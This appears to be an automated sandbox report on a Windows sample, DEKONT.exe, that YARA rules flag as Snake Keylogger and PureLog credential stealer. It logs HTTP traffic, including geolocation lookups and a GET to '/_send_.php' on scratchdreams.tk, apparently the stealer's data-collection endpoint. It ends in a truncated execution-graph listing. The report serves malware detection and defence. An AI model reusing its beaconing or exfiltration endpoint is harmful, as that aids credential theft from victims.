                                                            2024-04-24 08:12:05 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                            Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                            2024-04-24 08:12:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849710104.21.67.1524437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:06 UTC62OUTGET /xml/154.16.105.36 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-04-24 08:12:06 UTC706INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:06 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 10978
                                                            Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tzzpmQtV6HUzJJpSBiQVe%2BSRIa58kDjkALkxIg05miifHoGw%2FmhETjxwC7vkXiWe6aS7z1Ut62SE7PfgbvB8S3IgIeroLXCTprJjQ5vBpfps5Nq%2B9wiUdnJy8D0d1eIYIp8rCdl"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8794a05eeb930fe3-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-04-24 08:12:06 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                            Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                            2024-04-24 08:12:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849714104.21.67.1524437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:08 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:12:08 UTC702INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:08 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 10980
                                                            Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x227bsT7jjHOMic2Qc0m5Mxdgm0KZIi2rJOV2zMt41BPh4zH48M4hih94JH82aENtl97snxQ2sbufyL2gXijdLI38lWFnB6SOAndCQzPufqRn6T%2BwMeCwOJPDHk7yceYYl1RCCXN"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8794a068ab720924-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-04-24 08:12:08 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                            Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                            2024-04-24 08:12:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.849716104.21.67.1524437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:10 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:12:10 UTC704INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:10 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 10982
                                                            Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ywnDnoYQavWKsHPfOt0LGdGcHLr5yIlzo3tUA66vsWmbjBmbr12aM%2FzfOZixJ5YLhgePRMvK8k3p3piS5MB8GvtOoEmsi8AL0O8lJRbGJejH7GJzis618ahHEqQRVg6%2B7dnKzxu"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8794a075dd3478d7-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-04-24 08:12:10 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                            Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                            2024-04-24 08:12:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.849718104.21.67.1524437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:11 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:12:11 UTC704INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:11 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 10983
                                                            Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pbhsf6ioPlbyAc9eHsfVa%2FKRtBAU7PSkYp7lf3pXYMsAKaQIMiRg9qTNnszBOHEtUHdtuGIKnjTIzkTVQathxqiLSOxqIpKXhplU6h9vBoLY7tLPJJP9vCMh%2FhSDpBPXaccsIOY7"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8794a07e2cab14e6-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-04-24 08:12:11 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                            Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                            2024-04-24 08:12:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.849720104.21.67.1524437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:13 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:12:13 UTC710INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:13 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 10985
                                                            Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2OzTkV6XAmG8oy1gI0lTcwMJOUMsgiZ9lCkkLyRYkLNzTxo0jqU8i8cK0A1KIzAVMsnE48%2FlwyEO3HY0NicH8msULkuIubmPl0wfjjd0AzNiMqD%2Be%2FnLknXgwNGWYrB%2BIeuXH%2FC"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8794a0871fd62a8b-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-04-24 08:12:13 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                            Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                            2024-04-24 08:12:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.849722104.21.67.1524437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:14 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:12:14 UTC708INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:14 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 10986
                                                            Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNx37ARAyRv4evi4ARv3hhmDBLBJ8kqc3HjijSnkINzUGNpaOmHA4OOnrPwhjG5pX5FvOT5ppYDPf7H28H%2FeXJdAN8NupfzhF094QySZyM0u%2BZCDKdSftI%2FyjE169UblshxSdd%2FR"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8794a08fdbb80fc7-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-04-24 08:12:14 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                            Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                            2024-04-24 08:12:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.849724104.21.67.1524437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:15 UTC86OUTGET /xml/154.16.105.36 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:12:16 UTC712INHTTP/1.1 200 OK
                                                            Date: Wed, 24 Apr 2024 08:12:16 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 10988
                                                            Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KaTXTXq%2Fa5ufaw40RrcbpQ%2FxPTOnGj%2BJdHpsc0VqsO8FRVAIlDL08HY2SNh73C7zAdx%2FZCRIJRG8aRfa2dZgK21lOADN1JyK%2FlZgPMorEaPYUVnNwe5fdrD6vLxOopVkr%2BZaEctP"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8794a0982d4c2b6e-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-04-24 08:12:16 UTC368INData Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d
                                                            Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                            2024-04-24 08:12:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.849725104.21.27.854437564C:\Users\user\Desktop\DEKONT.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-24 08:12:18 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                            Host: scratchdreams.tk
                                                            Connection: Keep-Alive
                                                            2024-04-24 08:12:53 UTC741INHTTP/1.1 522
                                                            Date: Wed, 24 Apr 2024 08:12:53 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 15
                                                            Connection: close
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F9LUlnb3VVT%2FsdKByZOVo8ErDJ%2F8T%2BNnCtILNSIIh96hdHMJ%2FLBaVPdBznafSNxHn6hg0TISN7biQuQn76vksodKvZYZgc%2B5EXuYAP8O%2BqsIoXHjzamHwoGQlrYr9xzVS3ZX"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8794a0a73bed1508-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-04-24 08:12:53 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                            Data Ascii: error code: 522


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:10:12:00
                                                            Start date:24/04/2024
                                                            Path:C:\Users\user\Desktop\DEKONT.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\DEKONT.exe"
                                                            Imagebase:0xfe0000
                                                            File size:971'776 bytes
                                                            MD5 hash:384C4DA2B75F4C7A1FA5585BC07634E6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1378528073.0000000005B20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1375703382.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:10:12:02
                                                            Start date:24/04/2024
                                                            Path:C:\Users\user\Desktop\DEKONT.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\DEKONT.exe"
                                                            Imagebase:0xc30000
                                                            File size:971'776 bytes
                                                            MD5 hash:384C4DA2B75F4C7A1FA5585BC07634E6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:11.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:2.5%
                                                              Total number of Nodes:323
                                                              Total number of Limit Nodes:12
                                                              execution_graph 50610 32a0538 PostMessageW 50611 32a05e5 50610->50611 50758 59ab378 50759 59ab38c 50758->50759 50762 59a7684 50759->50762 50761 59ab3c3 50763 59a768f 50762->50763 50768 59ab7b4 50763->50768 50766 59ab7b4 4 API calls 50767 59abce2 50766->50767 50767->50761 50769 59ab7bf 50768->50769 50772 59ab82c 50769->50772 50771 59abcb0 50771->50766 50773 59ab837 50772->50773 50775 17f8509 4 API calls 50773->50775 50776 17f5ce4 4 API calls 50773->50776 50774 59ac994 50774->50771 50775->50774 50776->50774 50777 59a6a39 50778 59a6a55 50777->50778 50782 59a7f70 50778->50782 50787 59a7f60 50778->50787 50779 59a6a61 50783 59a7f7e 50782->50783 50784 59a7f9d 50782->50784 50792 59a734c FindCloseChangeNotification 50783->50792 50786 59a7f99 50786->50779 50788 59a7f70 50787->50788 50789 59a7f9d 50788->50789 50793 59a734c FindCloseChangeNotification 50788->50793 50791 59a7f99 50791->50779 50792->50786 50793->50791 50872 7abe25e 50877 7abeac0 50872->50877 50891 7abeb36 50872->50891 50906 7abead0 50872->50906 50873 7abe26d 50878 7abeaea 50877->50878 50889 7abeaf2 50878->50889 50920 7abf44f 50878->50920 50927 7abef18 50878->50927 50932 7abf606 50878->50932 50936 7abf527 50878->50936 50940 7abf347 50878->50940 50944 7abf0c7 50878->50944 50949 7abf200 50878->50949 50954 7abf100 50878->50954 50960 7abf093 50878->50960 50967 7abf03c 50878->50967 50972 7abef4d 50878->50972 50889->50873 50892 7abeac4 50891->50892 50893 7abeb39 50891->50893 50894 7abef18 2 API calls 50892->50894 50895 7abf44f 4 API calls 50892->50895 50896 